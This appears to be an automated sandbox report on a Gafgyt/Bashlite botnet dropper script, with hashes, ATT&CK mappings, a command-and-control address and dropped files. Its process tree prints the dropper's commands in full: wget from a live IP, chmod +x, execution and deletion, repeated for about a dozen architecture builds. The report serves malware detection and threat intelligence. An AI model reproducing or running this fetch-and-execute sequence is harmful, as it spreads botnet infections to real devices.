gafgyt | eb5304685569e3180cb79bc6144ddb4e7d9097ad83ab29ae2df1dee73d317951

Analysis

max time kernel
149s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
08/03/2025, 04:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sakura.sh
Size

1KB
MD5

405dcee6483503916dff1831cf8fa598
SHA1

49a10af144044bc4b863c1bb12d550a518ead823
SHA256

eb5304685569e3180cb79bc6144ddb4e7d9097ad83ab29ae2df1dee73d317951
SHA512

652c56e2e83382137a065ec736ddda5af7f0e0537d8cca42108f64b806a1384eb7dc53a0754460a2d2f046b4b036c2ad9448df1f42b07f2c1883ce2da70ebecf

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

104.248.115.71:606

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-2.dat	family_gafgyt
behavioral1/files/fstream-3.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt
behavioral1/files/fstream-5.dat	family_gafgyt
behavioral1/files/fstream-6.dat	family_gafgyt
behavioral1/files/fstream-7.dat	family_gafgyt
behavioral1/files/fstream-8.dat	family_gafgyt
behavioral1/files/fstream-9.dat	family_gafgyt
behavioral1/files/fstream-10.dat	family_gafgyt
behavioral1/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1492	chmod
1497	chmod
1530	chmod
1535	chmod
1540	chmod
1482	chmod
1503	chmod
1508	chmod
1514	chmod
1520	chmod
1525	chmod
1545	chmod
1487	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/m-i.p-s.s	1483	Sakura.sh
/tmp/m-p.s-l.s	1488	Sakura.sh
/tmp/s-h.4-.s	1493	Sakura.sh
/tmp/x-8.6-.s	1498	Sakura.sh
/tmp/a-r.m-6.s	1504	Sakura.sh
/tmp/x-3.2-.s	1509	Sakura.sh
/tmp/a-r.m-7.s	1515	Sakura.sh
/tmp/p-p.c-.s	1521	Sakura.sh
/tmp/i-5.8-6.s	1526	Sakura.sh
/tmp/m-6.8-k.s	1531	Sakura.sh
/tmp/p-p.c-.s	1536	Sakura.sh
/tmp/a-r.m-4.s	1541	Sakura.sh
/tmp/a-r.m-5.s	1546	Sakura.sh

Reads system routing table 1 TTPs 2 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	x-8.6-.s
File opened for reading	/proc/net/route	Sakura.sh

Reads system network configuration 1 TTPs 2 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	x-8.6-.s
File opened for reading	/proc/net/route	Sakura.sh

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/s-h.4-.s	wget
File opened for modification	/tmp/x-3.2-.s	wget
File opened for modification	/tmp/a-r.m-7.s	wget
File opened for modification	/tmp/p-p.c-.s	wget
File opened for modification	/tmp/i-5.8-6.s	wget
File opened for modification	/tmp/m-6.8-k.s	wget
File opened for modification	/tmp/a-r.m-5.s	wget
File opened for modification	/tmp/m-i.p-s.s	wget
File opened for modification	/tmp/m-p.s-l.s	wget
File opened for modification	/tmp/x-8.6-.s	wget
File opened for modification	/tmp/a-r.m-6.s	wget
File opened for modification	/tmp/p-p.c-.s	wget
File opened for modification	/tmp/a-r.m-4.s	wget

/tmp/Sakura.sh
/tmp/Sakura.sh
1⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1474
- /usr/bin/wget
  wget http://196.251.80.231/m-i.p-s.s
  2⤵
  - Writes file to tmp directory
  PID:1478
- /bin/chmod
  chmod +x m-i.p-s.s
  2⤵
  - File and Directory Permissions Modification
  PID:1482
- /tmp/m-i.p-s.s
  ./m-i.p-s.s
  2⤵
  PID:1483
- /bin/rm
  rm -rf m-i.p-s.s
  2⤵
  PID:1485
- /usr/bin/wget
  wget http://196.251.80.231/m-p.s-l.s
  2⤵
  - Writes file to tmp directory
  PID:1486
- /bin/chmod
  chmod +x m-p.s-l.s
  2⤵
  - File and Directory Permissions Modification
  PID:1487
- /tmp/m-p.s-l.s
  ./m-p.s-l.s
  2⤵
  PID:1488
- /bin/rm
  rm -rf m-p.s-l.s
  2⤵
  PID:1490
- /usr/bin/wget
  wget http://196.251.80.231/s-h.4-.s
  2⤵
  - Writes file to tmp directory
  PID:1491
- /bin/chmod
  chmod +x s-h.4-.s
  2⤵
  - File and Directory Permissions Modification
  PID:1492
- /tmp/s-h.4-.s
  ./s-h.4-.s
  2⤵
  PID:1493
- /bin/rm
  rm -rf s-h.4-.s
  2⤵
  PID:1495
- /usr/bin/wget
  wget http://196.251.80.231/x-8.6-.s
  2⤵
  - Writes file to tmp directory
  PID:1496
- /bin/chmod
  chmod +x x-8.6-.s
  2⤵
  - File and Directory Permissions Modification
  PID:1497
- /tmp/x-8.6-.s
  ./x-8.6-.s
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:1498
- /bin/rm
  rm -rf x-8.6-.s
  2⤵
  PID:1501
- /usr/bin/wget
  wget http://196.251.80.231/a-r.m-6.s
  2⤵
  - Writes file to tmp directory
  PID:1502
- /bin/chmod
  chmod +x a-r.m-6.s
  2⤵
  - File and Directory Permissions Modification
  PID:1503
- /tmp/a-r.m-6.s
  ./a-r.m-6.s
  2⤵
  PID:1504
- /bin/rm
  rm -rf a-r.m-6.s
  2⤵
  PID:1506
- /usr/bin/wget
  wget http://196.251.80.231/x-3.2-.s
  2⤵
  - Writes file to tmp directory
  PID:1507
- /bin/chmod
  chmod +x x-3.2-.s
  2⤵
  - File and Directory Permissions Modification
  PID:1508
- /bin/rm
  rm -rf x-3.2-.s
  2⤵
  PID:1512
- /usr/bin/wget
  wget http://196.251.80.231/a-r.m-7.s
  2⤵
  - Writes file to tmp directory
  PID:1513
- /bin/chmod
  chmod +x a-r.m-7.s
  2⤵
  - File and Directory Permissions Modification
  PID:1514
- /tmp/a-r.m-7.s
  ./a-r.m-7.s
  2⤵
  PID:1515
- /bin/rm
  rm -rf a-r.m-7.s
  2⤵
  PID:1517
- /usr/bin/wget
  wget http://196.251.80.231/p-p.c-.s
  2⤵
  - Writes file to tmp directory
  PID:1518
- /bin/chmod
  chmod +x p-p.c-.s
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/p-p.c-.s
  ./p-p.c-.s
  2⤵
  PID:1521
- /bin/rm
  rm -rf p-p.c-.s
  2⤵
  PID:1523
- /usr/bin/wget
  wget http://196.251.80.231/i-5.8-6.s
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x i-5.8-6.s
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/i-5.8-6.s
  ./i-5.8-6.s
  2⤵
  PID:1526
- /bin/rm
  rm -rf i-5.8-6.s
  2⤵
  PID:1528
- /usr/bin/wget
  wget http://196.251.80.231/m-6.8-k.s
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/chmod
  chmod +x m-6.8-k.s
  2⤵
  - File and Directory Permissions Modification
  PID:1530
- /tmp/m-6.8-k.s
  ./m-6.8-k.s
  2⤵
  PID:1531
- /bin/rm
  rm -rf m-6.8-k.s
  2⤵
  PID:1533
- /usr/bin/wget
  wget http://196.251.80.231/p-p.c-.s
  2⤵
  - Writes file to tmp directory
  PID:1534
- /bin/chmod
  chmod +x p-p.c-.s
  2⤵
  - File and Directory Permissions Modification
  PID:1535
- /tmp/p-p.c-.s
  ./p-p.c-.s
  2⤵
  PID:1536
- /bin/rm
  rm -rf p-p.c-.s
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://196.251.80.231/a-r.m-4.s
  2⤵
  - Writes file to tmp directory
  PID:1539
- /bin/chmod
  chmod +x a-r.m-4.s
  2⤵
  - File and Directory Permissions Modification
  PID:1540
- /tmp/a-r.m-4.s
  ./a-r.m-4.s
  2⤵
  PID:1541
- /bin/rm
  rm -rf a-r.m-4.s
  2⤵
  PID:1543
- /usr/bin/wget
  wget http://196.251.80.231/a-r.m-5.s
  2⤵
  - Writes file to tmp directory
  PID:1544
- /bin/chmod
  chmod +x a-r.m-5.s
  2⤵
  - File and Directory Permissions Modification
  PID:1545
- /tmp/a-r.m-5.s
  ./a-r.m-5.s
  2⤵
  PID:1546
- /bin/rm
  rm -rf a-r.m-5.s
  2⤵
  PID:1548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-5.s

Filesize
98KB

MD5
1fc658eaf31efaa2951a2335971092f8

SHA1
a1494e8ad0149adbe1d74ba4ffde5da891ae7744

SHA256
498d8ebd247e645e9a94b7890bbe0ab838bb662417871f09c6c4a92ee238259e

SHA512
cda93f60e7f71b8b4665b7ebd8f9e0bbde1d75aa9b843e047cf62605caa60c3afb1bd9b4a0c2365167d1b97f2d2283139bbbdaf06cff51d0c185a93699d3d284

Download Submit
/tmp/a-r.m-6.s

Filesize
118KB

MD5
c4829c82f5e7383bd9632b21e3a61f76

SHA1
7150aed3c8e867c0554d249b64d2c821dab61a35

SHA256
a3ad1bdfbd633fb54c06125112dda4ccbe79ba68a9b944f9462e9336d49dcdd8

SHA512
e53d4f40978db3af2855e730c79656f2692eadeeaa3215b9cfa40f952ea50faf7811047b76821ac58f1eebe8b2bd130b09d494d2af0acf7b4ef3ace7e034fdee

Download Submit
/tmp/a-r.m-7.s

Filesize
91KB

MD5
a0bcf70ac488d99b012ab9b327642fa5

SHA1
3e2b1f33f041a210175b936bf9c5333518b74b09

SHA256
9ed8278a6b84d953e686dac2a333183af5097e1ed9cc850ce7891c00892142b1

SHA512
a342dd3930c08bd725d4834dab74073a8ec07b75be649ddebb482b737393668faf2e4c1e60a73f976793ef8e04d6509f97931cecf82a81306f4f9139dff39fd2

Download Submit
/tmp/i-5.8-6.s

Filesize
96KB

MD5
41f6a0a8b013a3c6a6f4c411b979ebdd

SHA1
1813ee201bd93c0cb6d17496bd2a33b83d48fca2

SHA256
5ac81edb0b7d50220c97cf9a7d63a88eff4958f6cd4b852eec45a686179ea718

SHA512
76ea21964cc9c391586b1f2a75fd4c02036ccf41361c5268bfea22037dd44abfe6761ba082782c51c09a66b87311d312a7bb02eebab5099e2df0bf225eeff18a

Download Submit
/tmp/m-6.8-k.s

Filesize
156KB

MD5
e7d23f4b459d60109540b1fdf5fcbc33

SHA1
d07282c0da6594d17a34b591d3898904d5100ef3

SHA256
7d8d9a1dc738396d5a2eae133052a2f0e4dff2128878d8c4f333da7920bce499

SHA512
88ac801cc7ac19d89dd826cb2b1c270d628365f8b3adba813b923baa326b0ac37ab7c081988e722e3ce90a475b95dfc02e78a5fcd854fbdad6f9a7c792734816

Download Submit
/tmp/m-i.p-s.s

Filesize
123KB

MD5
6523a83977a25d88b3f92fb4cb534148

SHA1
833b030fa8761e7d3cc1a15c779b9e1f5087d927

SHA256
f46184dc736fe775fd0aceb34c85b4d3e337d0fca2db59c9c3ebaf1826473191

SHA512
657e97f1b55e3aa8c2168d745882d92d5479012fd10c6858230ef93140babc84c48c1d31fec60cf9b24fbdf2e1b3a0cdf120a5f91df32e050b759d59c970b466

Download Submit
/tmp/m-p.s-l.s

Filesize
123KB

MD5
e5b5b1b1f1a81c69445bce9deed31696

SHA1
2f33db2a24368146ae533caf09eb92ba6ad3467c

SHA256
b99e4fbbd19159729e5c8375f84868f5484ff4bb8303d32f771641f488c20057

SHA512
71a340ed570b82c920d355550bd5a8da19831dff973d0a80f3a86e2c479213e82d6005563bb7417f8f62a4b5a24f066bac2b0ed6ad9a423d43e175d7d27bfc66

Download Submit
/tmp/p-p.c-.s

Filesize
105KB

MD5
e6a23c9e8b83bfd73cbaa999b5a4fac0

SHA1
aa97bb8089440276a9667923ccf3e773a3463f54

SHA256
c847b5dda184f2322f8a3dae0f495c61c3f66d0938dab89107fefb73e6aa6202

SHA512
09b99ea60da120a435a9cf6c83705b9bfa37fefee5862dd392975bc33105895fa6a8509e466324a1198396f0b47ebf8ba573a3742e72172dc447ba5c67df7e05

Download Submit
/tmp/s-h.4-.s

Filesize
86KB

MD5
2c83e4090c03252157dc5846637f5317

SHA1
ffd4c4da68f428c64e3ce1f011af1268acc2c2b9

SHA256
f13ce45650aa219828fc0b8cdeb05f5c9086e41effc4fe43467895dff0f20666

SHA512
1534353c62155a41a3c0cd8805e7893cd9965492baa0c73c002acb920859841ed169eca3c5fb672f7e63db70ce06161af0c775f5e83a8e72547c92331d1bceb9

Download Submit
/tmp/x-3.2-.s

Filesize
83KB

MD5
dc49eb74382d0dc4e7200592e35badc3

SHA1
89040b1c65bde23ee8a34a6185ac743e63fa4cc7

SHA256
a6e85153b3abe1706e15d9fc174489a9a5acacecbbae01777ebd17881e79b288

SHA512
7dfe53b55f6f280c3936b57a9b4c997848ffda5e68b8527ff9a340be34cd2f8a569b0bc16b05f2738e41f049acdd8bbb9cd72628cfd5aa27c1494ae99aaded59

Download Submit
/tmp/x-8.6-.s

Filesize
92KB

MD5
2ccd12d15ba431a7384cbf521b5e2957

SHA1
e0691145dee5cc4ab06b348c219e73dea78f5d02

SHA256
bb88620641d6f1b7c7cd87fb91486691c4a34dd873b3247e88d04378b5b10928

SHA512
f472fb1862463eeab673f255a9c9e90e3204377068eb3c66c5f223550142dd2bc8495a6b046a3e4a535668b1b4572eca2a78734e897f00021db0a3678c8e79dd

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads